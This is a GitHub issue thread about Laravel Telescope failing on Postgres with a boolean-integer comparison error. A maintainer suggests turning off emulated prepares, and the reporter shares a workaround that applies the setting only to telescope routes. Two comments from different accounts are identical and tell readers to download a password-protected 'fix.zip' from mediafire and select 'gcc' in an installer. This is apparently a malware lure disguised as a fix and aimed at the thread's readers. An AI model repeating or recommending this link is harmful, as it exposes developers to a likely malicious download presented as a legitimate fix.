### ISSUE TITLE
SQL error "operator does not exist: boolean = integer" with Postgres

### ISSUE THREAD

**Issue by allantatter** [laravel/telescope#1511]
### Telescope Version

5.2.1

### Laravel Version

11.21.0

### PHP Version

8.2.21

### Database Driver & Version

psql (PostgreSQL) 14.12 (Homebrew)

### Description

Telescope views do not load with Postgres as a database driver. Tested with different Postges versions: 14 and 16.

```
SQLSTATE[42883]: Undefined function: 7 ERROR:  operator does not exist: boolean = integer
LINE 1: ... "type" = 'command' and "should_display_on_index" = 1 order ...
                                                             ^
HINT:  No operator matches the given name and argument types. You might need to add explicit type casts. (Connection: pgsql, SQL: select * from "telescope_entries" where "type" = command and "should_display_on_index" = 1 order by "sequence" desc limit 50) {"userId":1,"exception":"[object] (Illuminate\\Database\\QueryException(code: 42883): SQLSTATE[42883]: Undefined function: 7 ERROR:  operator does not exist: boolean = integer
```

### Steps To Reproduce

Fresh Laravel and Laravel Telescope install with Postgres.

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by hafezdivandari** [comment]
Please add the following lines to `config\database.php` file and let me know the result:

```diff
'connections' => [
    //...

    'pgsql' => [
        //...
        'sslmode' => 'prefer',
+       'options' => [
+           PDO::ATTR_EMULATE_PREPARES => false,
+       ],
    ],
],
```

**Comment by allantatter** [comment]
@hafezdivandari I needed to have emulate prepares as true for other parts of the application to work. I found a workaround to put change the emulate prepares config dynamically within TelescopeProvider's `register()` method:

```php
if ($this->app->request->is('telescope/*')) {
    Config::set('database.connections.pgsql.options.' . PDO::ATTR_EMULATE_PREPARES, false);
}
```
